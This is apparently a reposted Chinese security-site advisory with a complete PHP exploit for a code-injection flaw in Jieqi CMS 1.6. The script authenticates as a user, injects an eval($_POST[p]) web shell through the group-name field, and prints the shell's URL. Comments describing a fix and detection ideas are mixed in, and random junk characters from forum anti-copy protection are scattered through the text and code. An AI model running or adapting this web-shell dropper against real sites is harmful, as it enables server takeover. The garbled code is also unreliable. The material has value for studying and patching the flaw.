杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
需要有一个能创建圈子的用户。
) b; h2 i2 B& K# F% p<?php /* Proof-of-concept for a 2008-era code-injection bug in Jieqi CMS 1.6. What the code below demonstrates: the group-creation form field "gname" ends up inside a generated PHP file (files/group/userdir/0/<group id>/info.php) without escaping, so a quote in the name terminates the string literal and the rest of the name is executed as code. Fix in the CMS: never generate PHP source from user input (keep group metadata in the database or in a data-only file) and validate gname against a strict allowlist. */! ~' g1 R- b. l% Y& H: F
# C( Q+ B& l, R3 I4 f" fprint_r('$ Q2 U7 i# \) ~8 C
+---------------------------------------------------------------------------+! f! F5 v' J, E! `
Jieqi CMS V1.6 PHP Code Injection Exploit; [, A' }. Y" `' [+ d2 R o4 Z
by flyh4t
& k8 q. Y2 w7 R5 v/ h" V9 Zmail: phpsec at hotmail dot com/ z A2 a0 K8 ~; t! E, P
team: http://www.wolvez.org
+ x" J1 D6 @" r. o$ |+---------------------------------------------------------------------------+, D: @" e Y% Q5 B; w7 I
'); /**
$ w+ g) B, A' J2 w! K, \1 q5 ~ * works regardless of php.ini settings* t' [7 N6 i5 i) a
*/ if ($argc < 5) { print_r('& d v, H) b( }7 |4 i' i
+---------------------------------------------------------------------------+
" A* G6 I/ d$ i+ [' ]Usage: php '.$argv[0].' host path username* U/ `6 {4 V& x# J6 B: c
host: target server (ip/hostname)
* Y$ W5 ^- O2 I" {( r; j6 tpath: path to jieqicms ! w5 \/ s" @- c- P
uasename: a username who can create group! G+ m0 h0 I! T/ j' N* c6 k7 {& O$ O
Example:
1 P! R0 F* ?- b( K1 B4 A: K( pphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
8 a) G8 M+ P/ o+---------------------------------------------------------------------------+
3 a) p+ w5 b; F, _$ z1 b, h3 o'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /* Authenticates with the supplied credentials so the cookie jar can be reused for the group-creation request; the bug is only reachable by an account allowed to create groups, which is the privilege boundary a defender should audit. */ /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /* Multipart body assembled by hand; the "gname" part carries the injected PHP. Detection idea: alert on POSTs to modules/group/create.php whose gname contains quotes, "eval(" or PHP tags. */ /*get shell*/ $params ='-----------------------------23281168279961
3 q* y& W& P/ x$ }4 YContent-Disposition: form-data; name="gname"
- `2 w) T" T4 [
( i: |+ l0 f8 v \'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
+ z$ @) w/ R/ E- y# j' K% H-----------------------------23281168279961+ j% X; C Q( F: i% n1 l ^5 ^
Content-Disposition: form-data; name="gcatid"2 d( d7 B5 I, O. D1 {% x; [
4 n6 }: i4 E: S
12 E& x5 v/ ~7 Q+ P0 Y f4 \
-----------------------------23281168279961
* u. L7 n$ }9 d d& r+ a0 ~+ }Content-Disposition: form-data; name="gaudit"1 [5 h& y# }: D) Q& r; J
( |. B% ?/ X p3 i
14 S8 T8 ]+ w" D* p" Y1 q
-----------------------------232811682799613 O; K d2 V T) I( X4 I. z! T
Content-Disposition: form-data; name="gbrief"
) [. {% Z) Z0 Y' @& f ! \2 z* p5 a% |0 Z) r
19 k+ l4 p# r. |7 d8 {' ]7 \8 l
-----------------------------23281168279961--- P! L/ ^$ v/ z6 E5 R
'; /* Posts the form with the session cookie from the jar. CURLOPT_RETURNTRANSFER is not set, so the response is captured through output buffering (ob_start()/ob_get_contents()) rather than from curl_exec()'s return value. */ $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs is the returned content ob_clean(); www.2cto.com
4 C, v/ D, Q' |$ M 5 g B. u6 z1 {% Y3 D8 z
/* Scrapes the new group id (g=<digits>) from the response to locate the generated info.php. Host-side hardening check: scan files/group/userdir/*/info.php for content that was not produced by the CMS's own templates. */ preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |